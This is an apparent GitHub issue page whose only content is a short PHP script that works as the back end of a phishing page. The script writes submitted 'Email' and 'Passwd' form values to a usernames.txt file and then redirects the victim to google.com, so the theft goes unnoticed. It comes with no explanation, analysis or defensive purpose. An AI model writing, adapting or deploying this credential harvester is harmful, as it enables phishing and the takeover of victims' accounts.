abysmalbivko / musical-eureka

0 stars 0 forks source link

G #6

Open abysmalbivko opened 1 year ago

abysmalbivko commented 1 year ago

<?php

file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . " Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND); header('Location: https://google.com/'); exit();